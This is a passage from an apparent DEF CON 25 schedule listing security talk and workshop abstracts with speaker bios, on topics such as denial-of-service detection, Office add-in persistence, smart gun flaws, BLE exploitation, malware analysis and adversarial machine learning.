Ulf Frisk is a hacker/penetration tester working in the Swedish financial sector. Ulf focuses mainly on online banking security, penetration testing and it-security audits during daytime and low-level coding during nighttime. Ulf has been working professionally with security since 2011 and has a dark past as a developer.


Return to Index      -     

 

DEFCON - Track 2 - Sunday - 10:20-10:40


PEIMA (Probability Engine to Identify Malicious Activity): Using Power Laws to address Denial of Service Attacks

Sunday at 10:20 in Track 2

20 minutes | Art of Defense, Demo, Tool

Redezem Hacker

Denial of service. It requires a low level of resources and knowledge, it is very easy to deploy, it is very common and it is remarkable how effective it is overall. PEIMA is a brand new method of client side malicious activity detection based on mathematical laws, usually used in finance, text retrieval and social media analysis, that is fast, accurate, and capable of determining when denial of service attacks start and stop without flagging legitimate heavy interest in your server erroneously. However, denial of service attacks aren't the only type of anomalous activity you can look at with PEIMA. Learn what kinds of unusual identifying metrics you can get out of your network and users to help detect intrusions and, ultimately, defend your assets.

Redezem
Redezem hails from the southern hemisphere, specifically Perth, Australia, the most isolated capital city on the planet. He's been an avid computer tinkerer in this desolate, sunny, beach-ridden wasteland from a young age, and has been a "hacker" since he stole his dad's passwords to get at the internet as a kid. Having worked part time as a web application developer during his undergraduate degree in computer science, he specialised into intrusion detection in his honours year, and is currently performing his PhD into new and fantastic network anomaly detection mechanisms at Curtin University. He currently also lectures, and works part-time as a security consultant.


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 1 - Friday - 14:30-18:30


Penetration Testing in Hostile Environments: Client & Tester Security

Friday, 14:30 to 18:30 in Octavius 1

Wesley McGrew Director of Cyber Operations, HORNE Cyber Solutions

Brad Pierce Director of Network Security For HORNE Cyber

Penetration testers can have the tables turned on them by attackers, to the detriment of client and tester security. Vulnerabilities exist in widely-used penetration testing tools and procedures. Testing often takes place in hostile environments: across the public Internet, over wireless, and on client networks where attackers may already have a foothold. In these environments, common penetration testing practices can be targeted by third-party attackers. This can compromise testing teams in the style of “ihuntpineapples”, or worse: quietly and over a long period of time. The confidentiality, integrity, and availability of client networks is also put at risk by "sloppy" testing techniques.

In this workshop, we present a comprehensive set of recommendations that can be used to build secure penetration testing operations. This includes technical recommendations, policies, procedures, and guidance on how to communicate and work with client organizations about the risks and mitigations. The goal is to develop testing practices that:
- ...are more professionally sound
- ...protect client organizations
- ...protect penetration testers' infrastructure, and
- ...avoid a negative impact on speed, agility, and creativity of testers

The recommendations are illustrated with entertaining and informative hands-on exercises. These include:
- Vulnerability analysis of a penetration testing device's firmware
- Quick and dirty code audits of high-risk testing tools
- Monitoring and hijacking post-exploitation command and control
- Layering security around otherwise insecure tools.

After this workshop, you will walk away with actionable recommendations for improving the maturity and security of your penetration testing operations, as well as an exposure to the technical aspects of protecting the confidentiality of sensitive client data. You will participate in hands-on exercises that illustrate the importance of analyzing your own tools for vulnerabilities, and learn how to think like an attacker that hunts attackers. You'll hear about the challenges that are inherent in performing penetration tests on sensitive client networks, and learn how to layer security around your practices to reduce the risks.

Prerequisites: To get the most out of this class, students should have the ability to read/follow code in many programming languages (C/C++, Python, PHP, etc.). Students should also be familiar with navigation and use of the Linux command line. Experience with penetration testing will be useful, but those new to penetration testing should not be discouraged. The entire point is to pick up good operational security habits.

Materials: Students who wish to participate in the hands-on exercises should bring a laptop with at least 8GB of RAM, the operating system of their choice, and VMware Workstation or Fusion installed (sign up for a trial license from VMware just before the conference, if necessary). Virtual machines will be provided on USB sneakernet, so you may prefer to bring/configure a burner laptop. One exercise uses Wi-Fi. Apart from that, everything takes place within the virtual machines, and you will be able to disconnect all of your physical networking interfaces.

Max students: 36 | Registration: https://dc25_mcgrew.eventbrite.com (Sold out!)

Wesley McGrew
Wesley McGrew oversees and participates in penetration testing in his role of Director of Cyber Operations for HORNE Cyber Solutions. He has presented on topics of penetration testing, vulnerabilities, and malware analysis at DEF CON and Black Hat USA. He teaches a self-designed course on reverse engineering to students at Mississippi State University, using real-world, high-profile malware samples. Wesley graduated from Mississippi State University's Department of Computer Science and Engineering and previously worked at the Distributed Analytics and Security Institute. He holds a Ph.D. in computer science for his research in vulnerability analysis of SCADA HMI systems.

Brad Pierce
Brad Pierce manages penetration testing engagements and network infrastructure as Director of Network Security For HORNE Cyber. He brings more than 10 years of experience in network deployment, management, support and internal customer technology support. Brad served eight years in the United States Marine Corps receiving an Honorable Discharge in 2003. Brad is a graduate of The University of Southern Mississippi with a Bachelor of Science in Business Administration with an emphasis in management information systems.


Return to Index      -     

 

DEFCON - Track 1 - Saturday - 10:00-10:30


Persisting with Microsoft Office: Abusing Extensibility Options

Saturday at 10:00 in 101 Track

20 minutes | Demo

William Knowles MWR InfoSecurity

One software product that red teamers will almost certainly find on any compromised workstation is Microsoft Office. This talk will discuss the ways that native functionality within Office can be abused to obtain persistence. The following opportunities for Office-based persistence will be discussed:

(1) WLL and XLL add-ins for Word and Excel - a legacy add-in that allows arbitrary DLL loading.
(2) VBA add-ins for Excel and PowerPoint - an alternative to backdoored template files, which executes whenever the applications load.
(3) COM add-ins for all Office products - an older cross-application add-in that leverages COM objects.
(4) Automation add-ins for Excel - user defined functions that allow command execution through spreadsheet formulae.
(5) VBA editor (VBE) add-ins for all VBA using Office products - executing commands when someone tries to catch you using VBA to execute commands.
(6) VSTO add-ins for all Office products - the newer cross-application add-in that leverages a special Visual Studio runtime.

Each persistence mechanism will be discussed in terms of its relative advantages and disadvantages for red teamers. In particular, with regards to their complexity to deploy, privilege requirements, and applicability to Virtual Desktop Infrastructure (VDI) environments which hinder the use of many traditional persistence mechanisms.

The talk isn't all red - there's also some blue to satisfy the threat hunters and incident responders amongst us. The talk will finish with approaches to detection and prevention of these persistence mechanisms.

William Knowles
William Knowles is a Security Consultant at MWR InfoSecurity. He is primarily involved in purple team activities, which involves objective-based testing to simulate real-world threats, and helping organizations to identify effective defenses against them with regards to both prevention and detection. Prior to joining the security industry, he completed a PhD in Computer Science at Lancaster University. His research interests include post-exploitation activities and offensive PowerShell.

@william_knows


Return to Index      -     

 

DEFCON - Track 2 - Friday - 15:00-15:45


Phone system testing and other fun tricks

Friday at 15:00 in Track 2

45 minutes | Demo, Tool

"Snide" Owen Hacker

Phone systems have been long forgotten in favor of more modern technology. The phreakers of the past left us a wealth of information, however while moving forward the environments as a whole have become more complex. As a result they are often forgotten, side tracked or neglected to be thoroughly tested. We’ll cover the VoIP landscape, how to test the various components while focussing on PBX and IVR testing. The security issues that may be encountered are mapped to the relative OWASP category for familiarity. Moving on I’ll demonstrate other fun ways that you can utilize a PBX within your future offensive endeavours.

"Snide" Owen
"Snide" Owen has worked in various IT fields from tech support to development. Combining that knowledge he moved into the security field by way of Application Security and is now on an offensive security research team. He enjoys both making and breaking, tinkering with various technologies, and has experimented for prolonged periods with PBX's and the obscure side of VoIP.


Return to Index      -     

 

Demolabs - Table 6 - Saturday - 10:00-11:50


PIV OPACITY

Christopher Williams

Saturday from 1000-1150 at Table Six

Audience: Authentication, Mobile, Embedded Security, Biohacking

OPACITY is a fast, lightweight asymmetric encryption protocol, adopted as an open standard by NIST, ANSI, and Global Platform. OPACITY, originally designed for payment and identity applications, provides a method for securing the NFC channel of low power devices with embedded secure hardware, such as smart cards. I will show an Android demonstration leveraging this open standard, as defined in NIST SP 800-73-4, to securely produce derived credentials and provide flexible and private authentication. While this demo is designed to showcase the Federal PIV standard, the OPACITY algorithm and concepts are broadly applicable to provide secure transactions in IoT, biohacking, and other low power embedded systems.

https://youtu.be/ftn8-Cth554

Christopher Williams
Dr. Christopher Williams specializes in the implementation and evaluation of information assurance and data collection techniques to solve emerging problems around transaction security and privacy in IoT, fintech, and transportation. Dr. Williams has a Ph.D. in Physics from University of Chicago, where his dissertation research focused on design, prototyping, and field deployment of novel detectors for particle astrophysics. He has diverse scientific experience with expertise in systems integration, instrumentation, experimental design, and real-time data acquisition with a focus on systematic error mitigation. He has applied his expertise to validate standards compliance in secure messaging protocols between a smart card and host; and to study the integration of commercial cryptography solutions into a government approved authentication infrastructure for mobile platforms.


Return to Index      -     

 

Wireless - Florentine BR I & II - Promenade Level - Saturday - 13:00-13:25


POCSAG Amateur Pager Network

No description available


Return to Index      -     

 

DEFCON - Track 4 - Saturday - 17:00-17:45


Popping a Smart Gun

Saturday at 17:00 in Track 4

45 minutes | Demo, Exploit

Plore Hacker

Smart guns are sold with a promise: they can be fired only by authorized parties. That works in the movies, but what about in real life? In this talk, we explore the security of one of the only smart guns available for sale in the world. Three vulnerabilities will be demonstrated. First, we will show how to make the weapon fire even when separated from its owner by a considerable distance. Second, we will show how to prevent the weapon from firing even when authorized by its owner. Third, we will show how to fire the weapon even when not authorized by its owner, with no prior contact with the specific weapon, and with no modifications to the weapon.

Plore
Plore is an electrical engineer and embedded software developer based in the United States. At DEF CON 24, he spoke about cracking high-security electronic safe locks.

@_plore


Return to Index      -     

 

DEFCON - Track 1 - Thursday - 12:00-12:45


Porosity: A Decompiler For Blockchain-Based Smart Contracts Bytecode

Thursday at 12:00 in 101 Track

45 minutes | Demo, Tool

Matt Suiche Founder, Comae Technologies

Ethereum is gaining a significant popularity in the blockchain community, mainly due to fact that it is design in a way that enables developers to write decentralized applications (Dapps) and smart-contract using blockchain technology.

Ethereum blockchain is a consensus-based globally executed virtual machine, also referred as Ethereum Virtual Machine (EVM) by implemented its own micro-kernel supporting a handful number of instructions, its own stack, memory and storage. This enables the radical new concept of distributed applications.

Contracts live on the blockchain in an Ethereum-specific binary format (EVM bytecode). However, contracts are typically written in some high-level language such as Solidity and then compiled into byte code to be uploaded on the blockchain. Solidity is a contract-oriented, high-level language whose syntax is similar to that of JavaScript.
This new paradigm of applications opens the door to many possibilities and opportunities. Blockchain is often referred as secure by design, but now that blockchains can embed applications this raise multiple questions regarding architecture, design, attack vectors and patch deployments.

As we, reverse engineers, know having access to source code is often a luxury. Hence, the need for an open-source tool like Porosity: decompiler for EVM bytecode into readable Solidity-syntax contracts - to enable static and dynamic analysis of compiled contracts.

Matt Suiche
Matt Suiche is recognized as one of the world's leading authorities on memory forensics and application virtualization.

He is the founder of the United Arab Emirates based cyber-security start-up Comae Technologies. Prior to founding Comae, he was the co-founder & Chief Scientist of the application virtualization start-up CloudVolumes which was acquired by VMware in 2014. He also worked as a researcher for the Netherlands Forensic Institute.

His most notable research contributions enabled the community to perform memory-based forensics for Mac OS X memory snapshots but also Windows hibernation files.
Since 2009, Matt has been recognized as a Microsoft Most Valuable Professional in Enterprise Security due to his various contributions to the community.

@msuiche


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 1 - Saturday - 10:30-14:30


Practical BLE Exploitation for Internet of Things

Saturday, 10:30 to 14:30 in Octavius 1

Aditya Gupta Founder, Attify

Dinesh Shetty Security Innovation

The Practical BLE Exploitation for Internet of Things is a new training class focusing on exploiting the numerous IoT devices using BLE as the medium.

Bluetooth Low Energy (or BLE) is found in most of the popular IoT and smart devices - be it smart home automation, retail, medical devices and more. This class will go through the internals of BLE from a security perspective, and then jump right into how you could interact with BLE devices all the way to taking control over a complete IoT devices using BLE exploitation techniques.

At the end, we will also look at some of the automation tools and scripts you can use/write in order to make the process much faster - as it's required in a pentest.

Prerequisites: [+] Basic Linux knowledge [+] Interest in IoT security

Materials:- Laptop with 2 available USB ports
- 2 Ubuntu 16.04 VM instances (either one as host and one in a VM, or both inside separate VMs)
- Instructor will provide additional tools and devices to use during the workshop

Max students: 35 | Registration: https://dc25_gupta.eventbrite.com (Sold out!)

Aditya Gupta
Aditya Gupta (@adi1391) is the founder and principal consultant of Attify, a specialized IoT and mobile security firm, and a leading mobile security expert and evangelist.

He has done a lot of in-depth research on mobile application security and IoT device exploitation. He is also the creator and lead instructor for the popular training course "Offensive Internet of Things Exploitation," which has been sold out at numerous places including Black Hat US 2015, Black Hat US 2016, Brucon etc.

He is also the author of the popular Android security book "Learning Pentesting for Android Devices" that sold over 15,000 copies, since it was published in March 2014. He has also discovered serious web application security flaws in websites such as Google, Facebook, PayPal, Apple, Microsoft, Adobe and many more.

He has also published a research paper on ARM Exploitation titled "A Short Guide on ARM Exploitation." In his previous roles, he has worked on mobile security, application security, network penetration testing, developing automated internal tools to prevent fraud, finding and exploiting vulnerabilities and so on.

He is also a frequent speaker and trainer at numerous international security conferences including Black Hat, DefCon, Syscan, OWASP AppSec, PhDays, Brucon, Toorcon, Clubhack amongst others, and also provides private and customized training programmes for organizations.

Dinesh Shetty
Dinesh leads the Mobile Security Testing Center of Excellence at Security Innovation. He has performed innumerable penetration tests on Web, Mobile and IoT technologies - however his core area of expertise is Mobile and Embedded application pentesting and exploitation. He is an accomplished author and speaker, and his research has been published in multiple security zines and sites.

Dinesh Shetty has previously presented his work at security conferences around Europe, Boston, New York, Australia, India and a bunch of Middle East and South East Asia countries. He continues to enhance his knowledge by undergoing security trainings and certifications around the world.


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 7 - Saturday - 10:30-14:30


Practical Malware Analysis: Hands-On

Saturday, 10:30 to 14:30 in Octavius 7

Sam Bowne

Devin Duffy-Halseth

Dylan James Smith

Learn how to analyze Windows malware samples, with a hands-on series of projects in a fun, CTF-style environment. There are four levels of analysis challenges.

1. Basic static analysis with file, strings, PEiD, PEview, Dependency Walker, and VirusTotal
2. Basic dynamic analysis with Process Monitor, Process Explorer, RegShot, and Wireshark
3. Advanced static analysis with IDA Pro Free and Hopper
4. Advanced dynamic analysis with Ollydbg and Windbg

The first challenges are easy enough for beginners, and the later ones get difficult enough to interest intermediate security professionals. We will demonstrate the challenges, discuss the technologies and techniques, and help participants get through them as needed.

These challenges use harmless malware samples from the "Practice Malware Analysis" book by Michael Sikorski and Andrew Honig.

All materials and challenges are freely available at samsclass.info, including slide decks, video lectures, and hands-on project instructions. They will remain available after the workshop ends.

Prerequisites: Participant should be familiar with basic C programming. Experience with developing Windows applications, assembly language, and debuggers is helpful but not necessary.

Materials: Participants must bring a laptop (any OS) with VMware or VirtualBox installed on it. Each participant will need a 32-bit Windows virtual machine to run malware samples. USB sticks with a Windows Server 2008 VM will be available for students to copy. Some projects also use a Kali Linux VM to simulate the Internet, but that's not required.

Max students: 80 | Registration: https://dc25_bowne.eventbrite.com (Sold out!)

Sam Bowne
Sam Bowne has been teaching computer networking and security classes at City College San Francisco since 2000. He has given talks and hands-on trainings at DEFCON, HOPE, RSA, B-Sides SF, B-Sides LV, and many other cons. He has a PhD and a CISSP and a lot of T-shirts.

Devin Duffy-Halseth:
I really love hearing about different malware attack vectors and APT campaigns. I'm currently seeking a junior pentesting position.

Dylan James Smith
Dylan James Smith has assisted Sam Bowne with hands-on workshops at DEF CON, RSA, B-Sides LV and other conferences. He has worked in and around the computer support industry since adolescence. Now he’s old(er.) Currently focused on learning and teaching "the cybers."


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 4 - Saturday - 14:30-18:30


Principals on Leveraging PowerShell for Red Teams

Saturday, 14:30 to 18:30 in Octavius 4

Carlos Perez Director of Reverse Engineering

Workshop will focus on the fundamentals on how PowerShell is leveraged by an attacker in code execution and post-exploitation. We will also cover how depending the leverage of maturity of a target organization affects the techniques used and way to operate around some of the controls.

Prerequisites: Basic Windows sysadmin knowledge, basic scripting knowledge and a understanding of PowerShell Basics:

- What is PowerShell
- Cmdlets and Modules
- Using help and documentation
- Pipeline basics

Materials: Laptop with a Win10 Ent VM with Office trial (they can download the 90day demos from MS) and Sysinternals Sysmon installed.

Max students: 72 | Registration: https://dc25_perez.eventbrite.com (Sold out!)

Carlos Perez
Carlos Perez is the Director of Reverse Engineering at a security vendor and also worked as a Sr Solution Architect for a large IT Integrator in the areas of Security. He has won the Microsoft MVP award several years for his work on PowerShell and Enterprise Security. He is mostly known for his contributions to the Metasploit Framework and co-host in the Security Weekly podcast.


Return to Index      -     

 

CPV - Florentine Ballroom 4 - Saturday - 11:30-12:00


Title:
Privacy is Not An Add-On: Designing for Privacy from the Ground Up

Author:
Alisha Kloc

Abstract:
You want to design customer-focused, easy-to-use products that your customers will love - but you arent doing your job if you wait until the last minute (or beyond!) to think about privacy. Tacking on privacy features as an afterthought isnt only bad for your users, its also bad for your company. Privacy starts with your backend systems and carries forward through your product development cycle, your user testing, your product release, and all the way to your customer support. Learn how to build privacy into your products from the ground up, and create an awesome privacy story for both your company and your users.

Bio:
Alisha Kloc has worked in the security and privacy industry for over eight years, at companies ranging from startups to global powerhouses. Her focus is on protecting users data and developing industry-leading security and privacy programs. She is an advocate for user data protection, speaking at conferences across the US and Europe to highlight security & privacy issues and encourage people to choose security & privacy careers. Alisha is passionate about data security and user privacy, and believes in combining engineering, technology, policy, and culture to ensure users protection.
Twitter handle of presenter(s): @alishakloc

Return to Index      -     

 

Demolabs - Table 1 - Sunday - 10:00-11:50


probespy

stumblebot

Sunday from 1000-1150 at Table One

Audience: offense/recon/surveillance

Probespy is a dumb and dirty tool for analyzing directed and broadcast probe request data sent by wifi client devices. It assists in locating where wireless client devices have been (geolocation) and creating behavioral profiles of the person(s) owning the device via the identification of known SSIDs.

https://github.com/stumblebot/probespy

stumblebot
Stumblebot uses computers a lot. Currently he is paid to use computers on behalf of CDW's infosec team.


Return to Index      -     

 

CPV - Florentine Ballroom 4 - Friday - 13:00-14:00


Title:
Protecting Users' Privacy in a Location-Critical Enterprise: The Challenges of 9-1-1 Location

Author:
Trey Forgety

Abstract:
Precise location data can reveal the most sensitive details of a person's life. But, in an emergency, its the most important part of saving that life. This talk will detail how 9-1-1 systems acquire, use, and store sensitive location data today, and how that process will change as we transition to an all-IP Next Generation 9-1-1 world.

Bio:
Trey Forgety is Director of Government Affairs and Information Security Issues at NENA: The 9-1-1 Association. A physicist, lawyer, sailor, and inveterate tinkerer, Trey served two years as a Presidential Management Fellow with tours in DHS, the FCC, and NTIA, where he worked with the White House to develop policy for a nation-wide LTE network for public safety, known as FirstNet. By day, he handles legal, regulatory, and legislative issues affecting the 9-1-1 sector. By night, he handles the InfoSec issues, too. #SmallNonProfitLife
Twitter handle of presenter(s): @cincvolflt

Return to Index      -     

 

BHV - Pisa Room - Friday - 11:00-11:29


Title: Psychoactive Chemicals in Combat

Speaker: Amanda Plimpton/Evan Anderson

Amanda Plimpton/Evan Anderson:
Collaborators Amanda Plimpton and Evan Anderson are active in the body augmenting community and excited to see the current growth in the citizen science. Small groups and individuals who chose to pursue lines of inquiry and conduct ethical, methodical experiments are the key to the next series of breakthroughs that we will see across many sectors. Citizen scientists are people driven to investigate, experiment and seek answers. Whether they channel their passionate interests into a start-up business or stay in the nonprofit sector, they will continue to make important contributions in their fields. Our goal as speakers here is more modest, we are bringing forward research as a starting point for ourselves and our audience. Human experimentation has a long (and dark) history and today is fraught with ethical dilemmas and tensions. By looking at it through the lens of military experiments with a focus on psychoactive drugs we hope to add a small amount of research to the open source science body of work and to highlight the need for sound, ethically sourced data. Hopefully we will provoke thoughtful discussions around modern human experiments.

Abstract:
By looking at key experiments and trials done by the military we can learn about psychoactive chemicals and protocols that work, and don’t work, on humans. From biological enhancement to chemical deterrents, there is a wealth of information that grassroot scientists and body augmenters can use for their research and experiments.



Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 6 - Saturday - 14:30-18:30


Pwning machine learning systems

Saturday, 14:30 to 18:30 in Octavius 6

Clarence Chio Security Researcher

Anto Joseph Security Engineer, Intel

Pwning machine learning systems is an offensive-focused workshop that gives attendees a whirlwind introduction to the world of adversarial machine learning. This three-hour workshop will not be your run-of-the-mill introduction to machine learning course, (are you kidding? you can get that from a thousand different places online!) but will focus on hands-on examples, and actually attacking these systems. Every concept covered in this workshop will be backed-up with either a worked example or a challenge activity, (done in groups of 1 to 3) with minimal lecturing and maximum "doing". By the end of the workshop, students will be able to confidently pwn machine-learning-powered malware classifiers, intrusion detectors, and WAFs. We will cover the three major kinds of attacks on machine learning and deep learning systems - model poisoning, adversarial generation, and reinforcement learning attacks. As a bonus, attendees will emerge from the session with a fully-upgraded machine learning B.S. detector, giving them the ability to call B.S. on any "next-generation system" that claims to be impenetrable because of machine learning. This is an intermediate technical class suitable for attendees with some ability to read and write basic Python code. To get the most out of this workshop, surface-level understanding of machine learning is good. (be able to give a one-line answer to the question "What is machine learning?")

Prerequisites: Basic familiarity with Linux Python scripting knowledge is a plus, but not essential

Materials: latest version of virtualbox Installed administrative access on your laptop with external USB allowed at least 20 GB free hard disk space at least 4 GB RAM (the more the merrier)

Max students: 36 | Registration: https://dc25_chio.eventbrite.com (Sold out!)

Clarence Chio
Clarence Chio @cchio graduated with a B.S. and M.S. in Computer Science from Stanford within 4 years, specializing in data mining and artificial intelligence. He is in the process of co-authoring the O'Reilly book "Machine Learning and Security", and currently works as a Security Researcher and Data Scientist. Clarence spoke on Machine Learning and Security at DEF CON 24, GeekPwn Shanghai, PHDays Moscow, BSides Las Vegas and NYC, Code Blue Tokyo, SecTor Toronto, GrrCon Michigan, Hack in Paris, QCon San Francisco, and DeepSec Vienna (2015-2016). He had been a community speaker with Intel, and is also the founder and organizer of the"Data Mining for Cyber Security" meetup group, the largest gathering of security data scientists in the San Francisco Bay Area.

He has been/will be giving trainings/workshops in on machine learning and security at TROOPERS 17 (Heidelberg), HITB Amsterdam 2017, VXCON (Hong Kong), HITB GSEC (Singapore), and AppSec EU (Belfast).

Anto Joseph
Anto Joseph @antojosep007 is a Security Engineer for Intel. He has 4 years of corporate experience in developing and advocating security in machine learning and systems in mobile and web platforms. He is very passionate about exploring new ideas in these areas and has been a presenter and trainer at various security conferences including BH USA 2016, DEF CON 24, BruCon, Hack in Paris, HITB Amsterdam, NullCon, GroundZero, c0c0n, XorConf and more. He is an active contributor to many open-source projects and some of his work is available at https://github.com/antojoseph.


Return to Index      -     

 

IOT - Main Contest Area - Friday - 14:40-15:30



Return to Index      -     

 

Demolabs - Table 6 - Saturday - 14:00-15:50


Radare2

Maxime Morin

Saturday from 1400-1550 at Table Six

Audience: A lot of people are currently using radare2 for a large panel of different purposes; binary exploitation, weird CPU architecture reversing, binary diffing, ctf, emulation, We also try to get new contributors for the projects and invite students to collaborate via various platform such as Google Summer Of Code or the Radare Summer of Code we try to organize based on donations.

Radare2 is an open-source Reverse-Engineering Framework

> Project URL: http://radare.org/r/
> Git Project URL: https://github.com/radare/radare2

Maxime Morin
French IT Security Consultant living in Amsterdam, I work for FireEye in the i3 team, performing general technical threat analysis (Malware analysis, etc.). I'm interested in Reverse Engineering especially Malware related analysis. I am a modest contributor of the project and part of the core-group, I am mainly working on the regressions-test suite and mentoring a student for Google Summer of Code for the project this year. I have already done a workshop at BSidesLV and other conferences with others contributors for example at hack.lu and "unofficial" workshops in Vegas Bars/Restaurants I also rewrote the radare book which is quick intro for radare2.


Return to Index      -     

 

DEFCON - Track 1 - Friday - 16:00-16:45


Radio Exploitation 101: Characterizing, Contextualizing, and Applying Wireless Attack Methods

Friday at 16:00 in 101 Track

45 minutes | Demo

Matt Knight Senior Software Engineer, Threat Research at Bastille

Marc Newlin Security Researcher at Bastille

What do the Dallas tornado siren attack, hacked electric skateboards, and insecure smart door locks have in common? Vulnerable wireless protocols. Exploitation of wireless devices is growing increasingly common, thanks to the proliferation of radio frequency protocols driven by mobile and IoT. While non-Wi-Fi and non-Bluetooth RF protocols remain a mystery to many security practitioners, exploiting them is easier than one might think.

Join us as we walk through the fundamentals of radio exploitation. After introducing essential RF concepts and characteristics, we will develop a wireless threat taxonomy by analyzing and classifying different methods of attack. As we introduce each new attack, we will draw parallels to similar wired network exploits, and highlight attack primitives that are unique to RF. To illustrate these concepts, we will show each attack in practice with a series of live demos built on software-defined and hardware radios.

Attendees will come away from this session with an understanding of the mechanics of wireless network exploitation, and an awareness of how they can bridge their IP network exploitation skills to the wireless domain.

Matt Knight
Matt Knight is a software engineer and applied security researcher at Bastille, with a background in hardware, software, and wireless security. Matt's research focuses on preventing exploitation of the myriad wireless networking technologies that connect embedded devices to the Internet of Things. Notably, in 2016 he exposed the internals of the closed-source LoRa PHY based on blind signal analysis. Matt holds a BE in Electrical Engineering from Dartmouth College.

@embeddedsec

Marc Newlin
Marc Newlin is a wireless security researcher at Bastille, where he discovered the MouseJack and KeySniffer vulnerabilities affecting wireless mice and keyboards. A glutton for challenging side projects, Marc competed solo in two DARPA challenges, placing third in the DARPA Shredder Challenge, and second in the first tournament of the DARPA Spectrum Challenge.

@marcnewlin


Return to Index      -     

 

DEFCON - Track 1 - Friday - 11:00-11:45


Rage Against the Weaponized AI Propaganda Machine

Friday at 11:00 in 101 Track

45 minutes | 0025

Suggy (AKA Chris Sumner) Researcher, The Online Privacy Foundation

Psychographic targeting and the so called "Weaponized AI Propaganda Machine" have been blamed for swaying public opinion in recent political campaigns. But how effective are they? Why are people so divided on certain topics? And what influences their views? This talk presents the results of five studies exploring each of these questions. The studies examined authoritarianism, threat perception, personality-targeted advertising and biases in relation to support for communication surveillance as a counter-terrorism strategy. We found that people with an authoritarian disposition were more likely to be supportive of surveillance, but that those who are less authoritarian became increasingly supportive of such surveillance the greater they perceived the threat of terrorism. Using psychographic targeting we reached Facebook audiences with significantly different views on surveillance and demonstrated how tailoring pro and anti-surveillance ads based on authoritarianism affected return on marketing investment. Finally, we show how debunking propaganda faces big challenges as biases severely limit a person's ability to interpret evidence which runs contrary to their beliefs. The results illustrate the effectiveness of psychographic targeting and the ease with which individuals' inherent differences and biases can be exploited.

Suggy (AKA Chris Sumner)
Suggy is the lead researcher and co-founder of the not-for-profit Online Privacy Foundation, who contribute to the field of psychological research in online contexts. He has authored papers and spoken on this topic at DEF CON and other noteworthy security, psychology, artificial intelligence and machine learning conferences. For the past 4 years, Suggy has served as a member of the DEF CON CFP review board. By day, he works in security strategy at Hewlett Packard Enterprise.

@thesuggmeister,https://www.onlineprivacyfoundation.org/


Return to Index      -     

 

DEFCON - Track 2 - Thursday - 15:00-15:30


Real-time RFID Cloning in the Field

Thursday at 15:00 in 101 Track 2

20 minutes | Demo, Tool, Audience Participation

Dennis Maldonado Adversarial Engineer - LARES Consulting

Ever been on a job that required you to clone live RFID credentials? There are many different solutions to cloning RFID in the field and they all work fine, but the process can be slow, tedious, and error prone. What if there was a new way of cloning badges that solved these problems? In this presentation, we will discuss a smarter way for cloning RFID in the field that is vastly more efficient, useful, and just plane cool. We will go over the current tools and methods for long-range RFID cloning, than discuss and demonstrate a new method that will allow you to clone RFID credentials in the field in just seconds, changing the way you perform red team engagements forever.

Dennis Maldonado
Dennis Maldonado is a Security Consultant at LARES Consulting. His current work includes penetration testing, red teaming, and security research. Dennis' focus is encompassing all forms information security into an assessment in order to better simulate a real world attack against systems and infrastructure. As a security researcher and evangelist, Dennis spends his time sharing what he knows about Information Security with anyone willing to learn. Dennis co-founded Houston Locksport in Houston, Texas where he shares his love for lock-picking and physical security as well as Houston Area Hackers Anonymous (HAHA), a meet-up for hackers and InfoSec professionals in the Houston area. Dennis is also a returning speaker to DEF CON having spoken at DEF CON 23 and DEF CON 24.

@DennisMald


Return to Index      -     

 

RCV - Palermo room, Promenade level - Saturday - 13:00-13:25


Recon and Bug Bounties - What a great love story!

Abstract

Recon is an important phase in Penetration Testing. But wait,not everyone does that because everyone’s busy filling forms with values. Effective recon can often give you access to assets/boxes that are less commonly found by regular penetration testers. Internet is one of the best ways to find such hosts/assets. There are a bunch of tools available on the internet which can help researchers to get access to such boxes. Is reverse-IP really useful? Is dnsdumpster the only site that can give list of sub-domains? What if I told you there are many different ways which combined together can give you effective results. What if I told you I have got access to many dev/test boxes which should not have been public facing.

In this talk, the speaker will demonstrate few effective techniques using which researchers/pen testers can do better information gathering. The speaker would also share many stories which allowed him to earn some bounties using these recon techniques. This techniques might also be useful to red teams/incident response teams to identify rogue devices in their organisation which are often missed out during normal penetration testing. These might not be “best practices” but are definitely “good practices” and “nice to know” things while doing Penetration Testing.

Plus, the speaker will not just use presentation but will try to pray demo gods for some luck. Definitely some direct and key take aways to most attendees after the talk.

Speaker Profile

Abhijeth D (@abhijeth) is an AppSec dude at a bank and an Adjunct lecturer at UNSW in Australia. Previously worked with Adobe Systems, TCS and Sourcenxt. Security Enthusiast in the fields of Penetration Testing, Application / Mobile / Infrastructure Security. Believes in need for more security awareness and free responsible disclosures. Got lucky in finding few vulnerabilities with Google, Yahoo, Facebook, Microsoft, Ebay, Dropbox, etc and one among Top 5 researchers in Synack a bug bounty platform.


Return to Index      -     

 

IOT - Main Contest Area - Saturday - 16:10-16:59



Return to Index      -     

 

Wireless - Florentine BR I & II - Promenade Level - Friday - 18:00-18:55


Michael Ossmann

Bio

Michael Ossmann is a wireless security researcher who makes hardware for hackers. Best known for the open source HackRF, Ubertooth, and GreatFET projects, he founded Great Scott Gadgets in an effort to put exciting, new tools into the hands of innovative people.

@michaelossmann

Reverse Engineering DSSSSSSSSSSS Extended Cut

Abstract

Direct Sequence Spread Spectrum (DSSS) is a popular modulation technique for wireless communication that reduces the probability of interference and enables sharing of spectrum. It is also the central technology for Low Probability of Detection (LPD) and Low Probability of Intercept (LPI) radio systems. In addition to being used in well known systems such as Wi-Fi, ZigBee, and GPS, DSSS is extremely popular for proprietary satellite communications and for terrestrial radio transmissions that people don't want you to notice. I will show how DSSS signals can be detected much more easily than most people realize, and I will demonstrate techniques for reversing the pseudo-random sequence used in a DSSS implementation.


Return to Index      -     

 

PHW - Neopolitan BR IV - Promenade Level - Friday - 13:00-14:30


Reverse Engineering Malware 101

Malware Unicorn

This workshop provides the fundamentals of reversing engineering (RE) Windows malware using a hands-on experience with RE tools and techniques. Attendees will be introduced to RE terms and processes, followed by basic x86 assembly, and reviewing RE tools and malware techniques. It will conclude by attendees performing a hands-on malware analysis that consists of Triage, Static, and Dynamic analysis.

Prerequisites: Basic understanding of programming C/C++, Python, or Java

Provided: A virtual machine and tools will be provided.

Features: 5 Sections in 1.5 hours:

